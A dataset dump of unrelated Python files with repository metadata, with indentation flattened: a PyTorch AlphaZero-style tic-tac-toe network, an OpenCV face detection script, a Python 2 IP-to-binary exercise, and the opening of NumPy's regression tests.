2021-05-23T23:55:03.000Z
|
2021-07-09T16:01:10.000Z
|
behavioral_cloning/model.py
|
bartekx43/AlphaTTT
|
a01c38833a7f841483146bebeef73323d527d812
|
[
"MIT"
] | null | null | null |
behavioral_cloning/model.py
|
bartekx43/AlphaTTT
|
a01c38833a7f841483146bebeef73323d527d812
|
[
"MIT"
] | 2
|
2021-07-09T11:44:09.000Z
|
2021-07-11T12:32:58.000Z
|
import os
import numpy as np
from copy import deepcopy
from collections import deque
import torch
from torch import nn
from torch.nn import functional as F
from torch.optim import AdamW
torch.manual_seed(80085)
np.random.seed(80085)
def softXEnt(inp, target):  # temporary: cross-entropy with soft (probability) targets
logprobs = torch.log(inp)
cross_entropy = -(target * logprobs).sum() / inp.shape[0]
return cross_entropy
# TODO: try out this variant of residual blocks (diff from paper but same as behavioral_cloning) if doesn't work well
# try the regular BasicBlock (same as paper)
class IdentityBlock(nn.Module):
def __init__(self, f, filters, input_dim, use_bias=True):
super().__init__()
pad = int((f - 1)/2) # same padding
F1, F2 = filters
self.conv1 = nn.Conv2d(input_dim, F1, padding=(pad,pad), kernel_size=f, stride=1, bias=use_bias)
self.conv2 = nn.Conv2d(F1, F2, padding=(pad, pad), kernel_size=f, stride=1, bias=use_bias)
self.conv3 = nn.Conv2d(F2, F1, padding=(pad, pad), kernel_size=f, stride=1, bias=use_bias)
def forward(self, x):
shortcut = x
x = self.conv1(x)
x = F.leaky_relu(x, 0.2)
x = self.conv2(x)
x = F.leaky_relu(x, 0.2)
x = self.conv3(x)
x += shortcut
x = F.leaky_relu(x, 0.2)
return x
class ConvolutionalBlock(nn.Module):
def __init__(self, f, filters, input_dim, use_bias=True):
super().__init__()
pad = int((f - 1)/2) # same padding
F1, F2, F3 = filters
self.conv1 = nn.Conv2d(input_dim, F1, padding=(pad, pad), kernel_size=f, stride=1, bias=use_bias)
self.conv2 = nn.Conv2d(F1, F2, padding=(pad, pad), kernel_size=f, stride=1, bias=use_bias)
self.conv3 = nn.Conv2d(F2, F3, padding=(pad, pad), kernel_size=f, stride=1, bias=use_bias)
self.conv_change = nn.Conv2d(input_dim, F3, padding=(0,0), kernel_size=1, stride=1, bias=use_bias)
def forward(self, x):
shortcut = x
x = self.conv1(x)
x = F.leaky_relu(x, 0.2)
x = self.conv2(x)
x = F.leaky_relu(x, 0.2)
x = self.conv3(x)
shortcut = self.conv_change(shortcut)
x += shortcut
x = F.leaky_relu(x, 0.2)
return x
class PolicyHead(nn.Module):
def __init__(self, board_shape, use_bias):
super().__init__()
self.board_shape = board_shape
self.identity1 = IdentityBlock(3, [24, 48], 24, use_bias)
self.conv1 = nn.Conv2d(24, 1, padding=(1, 1), kernel_size=3, stride=1, bias=use_bias)
self.flatten = nn.Flatten()
def forward(self, x):
p = self.identity1(x)
p = self.conv1(p)
p = self.flatten(p)
p = F.softmax(p, dim=1)
return p
class ValueHead(nn.Module):
def __init__(self, use_bias):
super().__init__()
self.convolutional1 = ConvolutionalBlock(3, [24, 48, 1], 24, use_bias)
self.val_linear1 = nn.Linear(100, 1)  # NOTE: 100 = 10*10, assumes a 10x10 board
self.flatten = nn.Flatten()
def forward(self, x):
v = self.convolutional1(x)
v = self.flatten(v)
v = self.val_linear1(v)
v = torch.tanh(v)
return v
class Brain(nn.Module):
def __init__(self, input_shape=(3, 30, 30)):
super().__init__()
self.input_shape = input_shape
use_bias = True
self.conv1 = nn.Conv2d(input_shape[0], 16, padding=(2,2), kernel_size=5, stride=1, bias=use_bias)
self.convolutional1 = ConvolutionalBlock(5, [24, 48, 24], 16, use_bias)
self.identity1 = IdentityBlock(5, [24, 48], 24, use_bias)
self.policy_head = PolicyHead(input_shape, use_bias)
self.value_head = ValueHead(use_bias)
def forward(self, x):
# Core:
x = self.conv1(x)
x = F.leaky_relu(x)
x = self.convolutional1(x)
x = self.identity1(x)
p, v = self.policy_head(x), self.value_head(x)
return p, v
class ZeroTTT():
def __init__(self, brain_path=None, opt_path=None, board_len=10, lr=3e-4, weight_decay=0.0):
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
self.brain = Brain(input_shape=(3, board_len, board_len)).to(self.device)
self.board_len = board_len
self.optimizer = AdamW(self.brain.parameters(), lr=lr, weight_decay=weight_decay)
self.value_loss = nn.MSELoss()
self.policy_loss = softXEnt
if brain_path is not None:
self.load_brain(brain_path, opt_path)
def get_parameter_count(self):
return sum(p.numel() for p in self.brain.parameters() if p.requires_grad)
def save_brain(self, model_name, opt_state_name):
print("Saving brain...")
torch.save(self.brain.state_dict(), os.path.join('models', model_name))
if opt_state_name is not None:
torch.save(self.optimizer.state_dict(), os.path.join('models', opt_state_name))
def load_brain(self, model_name, opt_state_name):
print("Loading brain...")
self.brain.load_state_dict(torch.load(os.path.join('models', model_name), map_location=self.device))
if opt_state_name is not None:
self.optimizer.load_state_dict(torch.load(os.path.join('models', opt_state_name), map_location=self.device))
return
def predict(self, x, interpret_output=True):
if len(x.shape) < 4:
x = np.expand_dims(x, axis=0)
x = torch.from_numpy(x).float().to(self.device)
policy, value = self.brain(x)
if interpret_output: # return 2d policy map and value in usable form
policy = policy.view(-1, self.board_len, self.board_len)
policy = policy[0].cpu().detach().numpy()
value = value[0][0].item()
return policy, value
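# Hedged usage sketch (not part of the original file): instantiating the agent
# and running a single forward pass on an empty 10x10 board. The meaning of the
# three input planes (e.g. own stones / opponent stones / side to move) is an
# assumption made only for this illustration.
#
#   if __name__ == '__main__':
#       agent = ZeroTTT(board_len=10)
#       empty_board = np.zeros((3, 10, 10), dtype=np.float32)
#       policy, value = agent.predict(empty_board)
#       print(policy.shape, value)  # (10, 10) policy map and a value in [-1, 1]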
| 31.650888
| 117
| 0.672088
|
1a3fa20a45029a1209f44b58932498dc03d8d3e7
| 677
|
py
|
Python
|
face_recognition.py
|
M-inghsin/oss-enterprise
|
0f65b71ff356e6dcd82486a1226c7fd39aa4a1af
|
[
"CC-BY-4.0"
] | null | null | null |
face_recognition.py
|
M-inghsin/oss-enterprise
|
0f65b71ff356e6dcd82486a1226c7fd39aa4a1af
|
[
"CC-BY-4.0"
] | 1
|
2020-12-09T17:37:20.000Z
|
2020-12-09T17:37:21.000Z
|
face_recognition.py
|
M-inghsin/oss-enterprise
|
0f65b71ff356e6dcd82486a1226c7fd39aa4a1af
|
[
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/python
#-*- coding: utf-8 -*-
# Library: pip3 install opencv-python
import cv2
# Load the cascade
# /Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/cv2/data/haarcascade_frontalface_alt.xml
face_cascade = cv2.CascadeClassifier('face_detector.xml')
# Read the input image
img = cv2.imread('img_test.jpg')
# Detect faces in the image
faces = face_cascade.detectMultiScale(img, 1.1, 4)
# Draw rectangle around the faces
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 250, 205), 2)
# Export the result
cv2.imwrite('img_test.png', img)
print('Found {0} face(s)!'.format(len(faces)), '\nSuccessfully saved')
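# Optional variant (illustrative only): Haar cascades are trained on grayscale
# images, so detection is commonly run on a grayscale copy, which also tends to
# be faster. A hedged sketch of that variant:
#
#   gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#   faces = face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=4)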
| 28.208333
| 120
| 0.714919
|
ebbcf514ad4e4dc88e9cba7bb13fdb54c14fdf71
| 1,676
|
py
|
Python
|
First_course/ex3_1.py
|
laetrid/learning
|
b28312c34db2118fb7d5691834b8f7e628117642
|
[
"Apache-2.0"
] | null | null | null |
First_course/ex3_1.py
|
laetrid/learning
|
b28312c34db2118fb7d5691834b8f7e628117642
|
[
"Apache-2.0"
] | null | null | null |
First_course/ex3_1.py
|
laetrid/learning
|
b28312c34db2118fb7d5691834b8f7e628117642
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
'''
Learning Python
Class#3
I. Create an IP address converter (dotted decimal to binary). This will be
similar to what we did in class2 except:
A. Make the IP address a command-line argument instead of prompting the user
for it.
./binary_converter.py 10.88.17.23
B. Simplify the script logic by using the flow-control statements that we
learned in this class.
C. Zero-pad the digits such that the binary output is always 8-binary digits
long. Strip off the leading '0b' characters. For example,
OLD: 0b1010
NEW: 00001010
D. Print to standard output using a dotted binary format. For example,
IP address Binary
10.88.17.23 00001010.01011000.00010001.00010111
Note, you will probably need to use a 'while' loop and a 'break' statement
for part C.
while True:
...
break # on some condition (exit the while loop)
Python will execute this loop again and again until the 'break' is encountered.
'''
from sys import argv
if len(argv) != 2:
exit("\tYou should pass one argument for this script.\n\tExample: ./test3_1.py <IP address>")
ip_addr = argv[1]
formatter = "%-20s%-60s"
column1 = "IP address"
column2 = "Binary"
octets = ip_addr.split('.')
ip_addr_bin = []
if len(octets) != 4:
exit("Invalid IP address entered")
for octet in octets:
octet = bin(int(octet))
octet = octet[2:]
octet = "0" * (8 - len(octet)) + octet
ip_addr_bin.append(octet)
ip_addr_bin = '.'.join(ip_addr_bin)
print "=" * 80
print formatter % (column1, column2)
print formatter % (ip_addr, ip_addr_bin)
print "=" * 80
# The END
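# Illustrative alternative (a sketch added here, not part of the exercise):
# Python's format() mini-language can do the zero padding in one step, which
# would replace the manual "0" * (8 - len(octet)) logic above:
#
#   ip_addr_bin = '.'.join(format(int(octet), '08b') for octet in octets)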
| 28.896552
| 95
| 0.665871
|
7118af8c382513632fb098b4eb6fcffede74c371
| 68,558
|
py
|
Python
|
numpy/core/tests/test_regression.py
|
mdboom/numpy
|
7ae0206c4b5685a3b0abd1865850e0c92aeb7389
|
[
"BSD-3-Clause"
] | 3
|
2015-06-25T20:50:18.000Z
|
2021-06-11T22:09:02.000Z
|
numpy/core/tests/test_regression.py
|
mdboom/numpy
|
7ae0206c4b5685a3b0abd1865850e0c92aeb7389
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/core/tests/test_regression.py
|
mdboom/numpy
|
7ae0206c4b5685a3b0abd1865850e0c92aeb7389
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import division, absolute_import, print_function
import pickle
import sys
import platform
import gc
import copy
import warnings
import tempfile
from os import path
from io import BytesIO
import numpy as np
from numpy.testing import (
run_module_suite, TestCase, assert_, assert_equal,
assert_almost_equal, assert_array_equal, assert_array_almost_equal,
assert_raises, assert_warns, dec
)
from numpy.testing.utils import _assert_valid_refcount
from numpy.compat import asbytes, asunicode, asbytes_nested, long, sixu
rlevel = 1
class TestRegression(TestCase):
def test_invalid_round(self,level=rlevel):
"""Ticket #3"""
v = 4.7599999999999998
assert_array_equal(np.array([v]), np.array(v))
def test_mem_empty(self,level=rlevel):
"""Ticket #7"""
np.empty((1,), dtype=[('x', np.int64)])
def test_pickle_transposed(self,level=rlevel):
"""Ticket #16"""
a = np.transpose(np.array([[2, 9], [7, 0], [3, 8]]))
f = BytesIO()
pickle.dump(a, f)
f.seek(0)
b = pickle.load(f)
f.close()
assert_array_equal(a, b)
def test_typeNA(self,level=rlevel):
"""Ticket #31"""
assert_equal(np.typeNA[np.int64], 'Int64')
assert_equal(np.typeNA[np.uint64], 'UInt64')
def test_dtype_names(self,level=rlevel):
"""Ticket #35"""
dt = np.dtype([(('name', 'label'), np.int32, 3)])
def test_reduce(self,level=rlevel):
"""Ticket #40"""
assert_almost_equal(np.add.reduce([1., .5], dtype=None), 1.5)
def test_zeros_order(self,level=rlevel):
"""Ticket #43"""
np.zeros([3], int, 'C')
np.zeros([3], order='C')
np.zeros([3], int, order='C')
def test_asarray_with_order(self,level=rlevel):
"""Check that nothing is done when order='F' and array C/F-contiguous"""
a = np.ones(2)
assert_(a is np.asarray(a, order='F'))
def test_ravel_with_order(self,level=rlevel):
"""Check that ravel works when order='F' and array C/F-contiguous"""
a = np.ones(2)
assert_(not a.ravel('F').flags.owndata)
def test_sort_bigendian(self,level=rlevel):
"""Ticket #47"""
a = np.linspace(0, 10, 11)
c = a.astype(np.dtype('<f8'))
c.sort()
assert_array_almost_equal(c, a)
def test_negative_nd_indexing(self,level=rlevel):
"""Ticket #49"""
c = np.arange(125).reshape((5, 5, 5))
origidx = np.array([-1, 0, 1])
idx = np.array(origidx)
c[idx]
assert_array_equal(idx, origidx)
def test_char_dump(self,level=rlevel):
"""Ticket #50"""
f = BytesIO()
ca = np.char.array(np.arange(1000, 1010), itemsize=4)
ca.dump(f)
f.seek(0)
ca = np.load(f)
f.close()
def test_noncontiguous_fill(self,level=rlevel):
"""Ticket #58."""
a = np.zeros((5, 3))
b = a[:, :2,]
def rs():
b.shape = (10,)
self.assertRaises(AttributeError, rs)
def test_bool(self,level=rlevel):
"""Ticket #60"""
x = np.bool_(1)
def test_indexing1(self,level=rlevel):
"""Ticket #64"""
descr = [('x', [('y', [('z', 'c16', (2,)),]),]),]
buffer = ((([6j, 4j],),),)
h = np.array(buffer, dtype=descr)
h['x']['y']['z']
def test_indexing2(self,level=rlevel):
"""Ticket #65"""
descr = [('x', 'i4', (2,))]
buffer = ([3, 2],)
h = np.array(buffer, dtype=descr)
h['x']
def test_round(self,level=rlevel):
"""Ticket #67"""
x = np.array([1+2j])
assert_almost_equal(x**(-1), [1/(1+2j)])
def test_scalar_compare(self,level=rlevel):
"""Ticket #72"""
a = np.array(['test', 'auto'])
assert_array_equal(a == 'auto', np.array([False, True]))
self.assertTrue(a[1] == 'auto')
self.assertTrue(a[0] != 'auto')
b = np.linspace(0, 10, 11)
self.assertTrue(b != 'auto')
self.assertTrue(b[0] != 'auto')
def test_unicode_swapping(self,level=rlevel):
"""Ticket #79"""
ulen = 1
ucs_value = sixu('\U0010FFFF')
ua = np.array([[[ucs_value*ulen]*2]*3]*4, dtype='U%s' % ulen)
ua2 = ua.newbyteorder()
def test_object_array_fill(self,level=rlevel):
"""Ticket #86"""
x = np.zeros(1, 'O')
x.fill([])
def test_mem_dtype_align(self,level=rlevel):
"""Ticket #93"""
self.assertRaises(TypeError, np.dtype,
{'names':['a'],'formats':['foo']}, align=1)
@dec.knownfailureif((sys.version_info[0] >= 3) or
(sys.platform == "win32" and platform.architecture()[0] == "64bit"),
"numpy.intp('0xff', 16) not supported on Py3, "
"as it does not inherit from Python int")
def test_intp(self,level=rlevel):
"""Ticket #99"""
i_width = np.int_(0).nbytes*2 - 1
np.intp('0x' + 'f'*i_width, 16)
self.assertRaises(OverflowError, np.intp, '0x' + 'f'*(i_width+1), 16)
self.assertRaises(ValueError, np.intp, '0x1', 32)
assert_equal(255, np.intp('0xFF', 16))
assert_equal(1024, np.intp(1024))
def test_endian_bool_indexing(self,level=rlevel):
"""Ticket #105"""
a = np.arange(10., dtype='>f8')
b = np.arange(10., dtype='<f8')
xa = np.where((a>2) & (a<6))
xb = np.where((b>2) & (b<6))
ya = ((a>2) & (a<6))
yb = ((b>2) & (b<6))
assert_array_almost_equal(xa, ya.nonzero())
assert_array_almost_equal(xb, yb.nonzero())
assert_(np.all(a[ya] > 0.5))
assert_(np.all(b[yb] > 0.5))
def test_endian_where(self,level=rlevel):
"""GitHuB issue #369"""
net = np.zeros(3, dtype='>f4')
net[1] = 0.00458849
net[2] = 0.605202
max_net = net.max()
test = np.where(net <= 0., max_net, net)
correct = np.array([ 0.60520202, 0.00458849, 0.60520202])
assert_array_almost_equal(test, correct)
def test_endian_recarray(self,level=rlevel):
"""Ticket #2185"""
dt = np.dtype([
('head', '>u4'),
('data', '>u4', 2),
])
buf = np.recarray(1, dtype=dt)
buf[0]['head'] = 1
buf[0]['data'][:] = [1, 1]
h = buf[0]['head']
d = buf[0]['data'][0]
buf[0]['head'] = h
buf[0]['data'][0] = d
assert_(buf[0]['head'] == 1)
def test_mem_dot(self,level=rlevel):
"""Ticket #106"""
x = np.random.randn(0, 1)
y = np.random.randn(10, 1)
# Dummy array to detect bad memory access:
_z = np.ones(10)
_dummy = np.empty((0, 10))
z = np.lib.stride_tricks.as_strided(_z, _dummy.shape, _dummy.strides)
np.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
# Do the same for the built-in dot:
np.core.multiarray.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
def test_arange_endian(self,level=rlevel):
"""Ticket #111"""
ref = np.arange(10)
x = np.arange(10, dtype='<f8')
assert_array_equal(ref, x)
x = np.arange(10, dtype='>f8')
assert_array_equal(ref, x)
# Longfloat support is not consistent enough across
# platforms for this test to be meaningful.
# def test_longfloat_repr(self,level=rlevel):
# """Ticket #112"""
# if np.longfloat(0).itemsize > 8:
# a = np.exp(np.array([1000],dtype=np.longfloat))
# assert_(str(a)[1:9] == str(a[0])[:8])
def test_argmax(self,level=rlevel):
"""Ticket #119"""
a = np.random.normal(0, 1, (4, 5, 6, 7, 8))
for i in range(a.ndim):
aargmax = a.argmax(i)
def test_mem_divmod(self,level=rlevel):
"""Ticket #126"""
for i in range(10):
divmod(np.array([i])[0], 10)
def test_hstack_invalid_dims(self,level=rlevel):
"""Ticket #128"""
x = np.arange(9).reshape((3, 3))
y = np.array([0, 0, 0])
self.assertRaises(ValueError, np.hstack, (x, y))
def test_squeeze_type(self,level=rlevel):
"""Ticket #133"""
a = np.array([3])
b = np.array(3)
assert_(type(a.squeeze()) is np.ndarray)
assert_(type(b.squeeze()) is np.ndarray)
def test_add_identity(self,level=rlevel):
"""Ticket #143"""
assert_equal(0, np.add.identity)
def test_numpy_float_python_long_addition(self):
# Check that numpy float and python longs can be added correctly.
a = np.float_(23.) + 2**135
assert_equal(a, 23. + 2**135)
def test_binary_repr_0(self,level=rlevel):
"""Ticket #151"""
assert_equal('0', np.binary_repr(0))
def test_rec_iterate(self,level=rlevel):
"""Ticket #160"""
descr = np.dtype([('i', int), ('f', float), ('s', '|S3')])
x = np.rec.array([(1, 1.1, '1.0'),
(2, 2.2, '2.0')], dtype=descr)
x[0].tolist()
[i for i in x[0]]
def test_unicode_string_comparison(self,level=rlevel):
"""Ticket #190"""
a = np.array('hello', np.unicode_)
b = np.array('world')
a == b
def test_tostring_FORTRANORDER_discontiguous(self,level=rlevel):
"""Fix in r2836"""
# Create discontiguous Fortran-ordered array
x = np.array(np.random.rand(3, 3), order='F')[:, :2]
assert_array_almost_equal(x.ravel(), np.fromstring(x.tostring()))
def test_flat_assignment(self,level=rlevel):
"""Correct behaviour of ticket #194"""
x = np.empty((3, 1))
x.flat = np.arange(3)
assert_array_almost_equal(x, [[0], [1], [2]])
x.flat = np.arange(3, dtype=float)
assert_array_almost_equal(x, [[0], [1], [2]])
def test_broadcast_flat_assignment(self,level=rlevel):
"""Ticket #194"""
x = np.empty((3, 1))
def bfa(): x[:] = np.arange(3)
def bfb(): x[:] = np.arange(3, dtype=float)
self.assertRaises(ValueError, bfa)
self.assertRaises(ValueError, bfb)
def test_nonarray_assignment(self):
# See also Issue gh-2870, test for nonarray assignment
# and equivalent unsafe casted array assignment
a = np.arange(10)
b = np.ones(10, dtype=bool)
r = np.arange(10)
def assign(a, b, c):
a[b] = c
assert_raises(ValueError, assign, a, b, np.nan)
a[b] = np.array(np.nan) # but not this.
assert_raises(ValueError, assign, a, r, np.nan)
a[r] = np.array(np.nan)
def test_unpickle_dtype_with_object(self,level=rlevel):
"""Implemented in r2840"""
dt = np.dtype([('x', int), ('y', np.object_), ('z', 'O')])
f = BytesIO()
pickle.dump(dt, f)
f.seek(0)
dt_ = pickle.load(f)
f.close()
assert_equal(dt, dt_)
def test_mem_array_creation_invalid_specification(self,level=rlevel):
"""Ticket #196"""
dt = np.dtype([('x', int), ('y', np.object_)])
# Wrong way
self.assertRaises(ValueError, np.array, [1, 'object'], dt)
# Correct way
np.array([(1, 'object')], dt)
def test_recarray_single_element(self,level=rlevel):
"""Ticket #202"""
a = np.array([1, 2, 3], dtype=np.int32)
b = a.copy()
r = np.rec.array(a, shape=1, formats=['3i4'], names=['d'])
assert_array_equal(a, b)
assert_equal(a, r[0][0])
def test_zero_sized_array_indexing(self,level=rlevel):
"""Ticket #205"""
tmp = np.array([])
def index_tmp(): tmp[np.array(10)]
self.assertRaises(IndexError, index_tmp)
def test_chararray_rstrip(self,level=rlevel):
"""Ticket #222"""
x = np.chararray((1,), 5)
x[0] = asbytes('a ')
x = x.rstrip()
assert_equal(x[0], asbytes('a'))
def test_object_array_shape(self,level=rlevel):
"""Ticket #239"""
assert_equal(np.array([[1, 2], 3, 4], dtype=object).shape, (3,))
assert_equal(np.array([[1, 2], [3, 4]], dtype=object).shape, (2, 2))
assert_equal(np.array([(1, 2), (3, 4)], dtype=object).shape, (2, 2))
assert_equal(np.array([], dtype=object).shape, (0,))
assert_equal(np.array([[], [], []], dtype=object).shape, (3, 0))
assert_equal(np.array([[3, 4], [5, 6], None], dtype=object).shape, (3,))
def test_mem_around(self,level=rlevel):
"""Ticket #243"""
x = np.zeros((1,))
y = [0]
decimal = 6
np.around(abs(x-y), decimal) <= 10.0**(-decimal)
def test_character_array_strip(self,level=rlevel):
"""Ticket #246"""
x = np.char.array(("x", "x ", "x "))
for c in x: assert_equal(c, "x")
def test_lexsort(self,level=rlevel):
"""Lexsort memory error"""
v = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
assert_equal(np.lexsort(v), 0)
def test_pickle_dtype(self,level=rlevel):
"""Ticket #251"""
pickle.dumps(np.float)
def test_swap_real(self, level=rlevel):
"""Ticket #265"""
assert_equal(np.arange(4, dtype='>c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='<c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='>c8').real.max(), 3.0)
assert_equal(np.arange(4, dtype='<c8').real.max(), 3.0)
def test_object_array_from_list(self, level=rlevel):
"""Ticket #270"""
a = np.array([1, 'A', None])
def test_multiple_assign(self, level=rlevel):
"""Ticket #273"""
a = np.zeros((3, 1), int)
a[[1, 2]] = 1
def test_empty_array_type(self, level=rlevel):
assert_equal(np.array([]).dtype, np.zeros(0).dtype)
def test_void_copyswap(self, level=rlevel):
dt = np.dtype([('one', '<i4'), ('two', '<i4')])
x = np.array((1, 2), dtype=dt)
x = x.byteswap()
assert_(x['one'] > 1 and x['two'] > 2)
def test_method_args(self, level=rlevel):
# Make sure methods and functions have same default axis
# keyword and arguments
funcs1= ['argmax', 'argmin', 'sum', ('product', 'prod'),
('sometrue', 'any'),
('alltrue', 'all'), 'cumsum', ('cumproduct', 'cumprod'),
'ptp', 'cumprod', 'prod', 'std', 'var', 'mean',
'round', 'min', 'max', 'argsort', 'sort']
funcs2 = ['compress', 'take', 'repeat']
for func in funcs1:
arr = np.random.rand(8, 7)
arr2 = arr.copy()
if isinstance(func, tuple):
func_meth = func[1]
func = func[0]
else:
func_meth = func
res1 = getattr(arr, func_meth)()
res2 = getattr(np, func)(arr2)
if res1 is None:
assert_(abs(arr-res2).max() < 1e-8, func)
else:
assert_(abs(res1-res2).max() < 1e-8, func)
for func in funcs2:
arr1 = np.random.rand(8, 7)
arr2 = np.random.rand(8, 7)
res1 = None
if func == 'compress':
arr1 = arr1.ravel()
res1 = getattr(arr2, func)(arr1)
else:
arr2 = (15*arr2).astype(int).ravel()
if res1 is None:
res1 = getattr(arr1, func)(arr2)
res2 = getattr(np, func)(arr1, arr2)
assert_(abs(res1-res2).max() < 1e-8, func)
def test_mem_lexsort_strings(self, level=rlevel):
"""Ticket #298"""
lst = ['abc', 'cde', 'fgh']
np.lexsort((lst,))
def test_fancy_index(self, level=rlevel):
"""Ticket #302"""
x = np.array([1, 2])[np.array([0])]
assert_equal(x.shape, (1,))
def test_recarray_copy(self, level=rlevel):
"""Ticket #312"""
dt = [('x', np.int16), ('y', np.float64)]
ra = np.array([(1, 2.3)], dtype=dt)
rb = np.rec.array(ra, dtype=dt)
rb['x'] = 2.
assert_(ra['x'] != rb['x'])
def test_rec_fromarray(self, level=rlevel):
"""Ticket #322"""
x1 = np.array([[1, 2], [3, 4], [5, 6]])
x2 = np.array(['a', 'dd', 'xyz'])
x3 = np.array([1.1, 2, 3])
np.rec.fromarrays([x1, x2, x3], formats="(2,)i4,a3,f8")
def test_object_array_assign(self, level=rlevel):
x = np.empty((2, 2), object)
x.flat[2] = (1, 2, 3)
assert_equal(x.flat[2], (1, 2, 3))
def test_ndmin_float64(self, level=rlevel):
"""Ticket #324"""
x = np.array([1, 2, 3], dtype=np.float64)
assert_equal(np.array(x, dtype=np.float32, ndmin=2).ndim, 2)
assert_equal(np.array(x, dtype=np.float64, ndmin=2).ndim, 2)
def test_ndmin_order(self, level=rlevel):
"""Issue #465 and related checks"""
assert_(np.array([1, 2], order='C', ndmin=3).flags.c_contiguous)
assert_(np.array([1, 2], order='F', ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='F'), ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='C'), ndmin=3).flags.c_contiguous)
def test_mem_axis_minimization(self, level=rlevel):
"""Ticket #327"""
data = np.arange(5)
data = np.add.outer(data, data)
def test_mem_float_imag(self, level=rlevel):
"""Ticket #330"""
np.float64(1.0).imag
def test_dtype_tuple(self, level=rlevel):
"""Ticket #334"""
assert_(np.dtype('i4') == np.dtype(('i4', ())))
def test_dtype_posttuple(self, level=rlevel):
"""Ticket #335"""
np.dtype([('col1', '()i4')])
def test_numeric_carray_compare(self, level=rlevel):
"""Ticket #341"""
assert_equal(np.array(['X'], 'c'), asbytes('X'))
def test_string_array_size(self, level=rlevel):
"""Ticket #342"""
self.assertRaises(ValueError,
np.array, [['X'], ['X', 'X', 'X']], '|S1')
def test_dtype_repr(self, level=rlevel):
"""Ticket #344"""
dt1=np.dtype(('uint32', 2))
dt2=np.dtype(('uint32', (2,)))
assert_equal(dt1.__repr__(), dt2.__repr__())
def test_reshape_order(self, level=rlevel):
"""Make sure reshape order works."""
a = np.arange(6).reshape(2, 3, order='F')
assert_equal(a, [[0, 2, 4], [1, 3, 5]])
a = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])
b = a[:, 1]
assert_equal(b.reshape(2, 2, order='F'), [[2, 6], [4, 8]])
def test_reshape_zero_strides(self, level=rlevel):
"""Issue #380, test reshaping of zero strided arrays"""
a = np.ones(1)
a = np.lib.stride_tricks.as_strided(a, shape=(5,), strides=(0,))
assert_(a.reshape(5, 1).strides[0] == 0)
def test_reshape_zero_size(self, level=rlevel):
"""Github Issue #2700, setting shape failed for 0-sized arrays"""
a = np.ones((0, 2))
a.shape = (-1, 2)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_reshape_trailing_ones_strides(self):
# Github issue gh-2949, bad strides for trailing ones of new shape
a = np.zeros(12, dtype=np.int32)[::2] # not contiguous
strides_c = (16, 8, 8, 8)
strides_f = (8, 24, 48, 48)
assert_equal(a.reshape(3, 2, 1, 1).strides, strides_c)
assert_equal(a.reshape(3, 2, 1, 1, order='F').strides, strides_f)
assert_equal(np.array(0, dtype=np.int32).reshape(1, 1).strides, (4, 4))
def test_repeat_discont(self, level=rlevel):
"""Ticket #352"""
a = np.arange(12).reshape(4, 3)[:, 2]
assert_equal(a.repeat(3), [2, 2, 2, 5, 5, 5, 8, 8, 8, 11, 11, 11])
def test_array_index(self, level=rlevel):
"""Make sure optimization is not called in this case."""
a = np.array([1, 2, 3])
a2 = np.array([[1, 2, 3]])
assert_equal(a[np.where(a==3)], a2[np.where(a2==3)])
def test_object_argmax(self, level=rlevel):
a = np.array([1, 2, 3], dtype=object)
assert_(a.argmax() == 2)
def test_recarray_fields(self, level=rlevel):
"""Ticket #372"""
dt0 = np.dtype([('f0', 'i4'), ('f1', 'i4')])
dt1 = np.dtype([('f0', 'i8'), ('f1', 'i8')])
for a in [np.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)]),
np.rec.fromarrays([(1, 2), (3, 4)], "i4,i4"),
np.rec.fromarrays([(1, 2), (3, 4)])]:
assert_(a.dtype in [dt0, dt1])
def test_random_shuffle(self, level=rlevel):
"""Ticket #374"""
a = np.arange(5).reshape((5, 1))
b = a.copy()
np.random.shuffle(b)
assert_equal(np.sort(b, axis=0), a)
def test_refcount_vdot(self, level=rlevel):
"""Changeset #3443"""
_assert_valid_refcount(np.vdot)
def test_startswith(self, level=rlevel):
ca = np.char.array(['Hi', 'There'])
assert_equal(ca.startswith('H'), [True, False])
def test_noncommutative_reduce_accumulate(self, level=rlevel):
"""Ticket #413"""
tosubtract = np.arange(5)
todivide = np.array([2.0, 0.5, 0.25])
assert_equal(np.subtract.reduce(tosubtract), -10)
assert_equal(np.divide.reduce(todivide), 16.0)
assert_array_equal(np.subtract.accumulate(tosubtract),
np.array([0, -1, -3, -6, -10]))
assert_array_equal(np.divide.accumulate(todivide),
np.array([2., 4., 16.]))
def test_convolve_empty(self, level=rlevel):
"""Convolve should raise an error for empty input array."""
self.assertRaises(ValueError, np.convolve, [], [1])
self.assertRaises(ValueError, np.convolve, [1], [])
def test_multidim_byteswap(self, level=rlevel):
"""Ticket #449"""
r=np.array([(1, (0, 1, 2))], dtype="i2,3i2")
assert_array_equal(r.byteswap(),
np.array([(256, (0, 256, 512))], r.dtype))
def test_string_NULL(self, level=rlevel):
"""Changeset 3557"""
assert_equal(np.array("a\x00\x0b\x0c\x00").item(),
'a\x00\x0b\x0c')
def test_junk_in_string_fields_of_recarray(self, level=rlevel):
"""Ticket #483"""
r = np.array([[asbytes('abc')]], dtype=[('var1', '|S20')])
assert_(asbytes(r['var1'][0][0]) == asbytes('abc'))
def test_take_output(self, level=rlevel):
"""Ensure that 'take' honours output parameter."""
x = np.arange(12).reshape((3, 4))
a = np.take(x, [0, 2], axis=1)
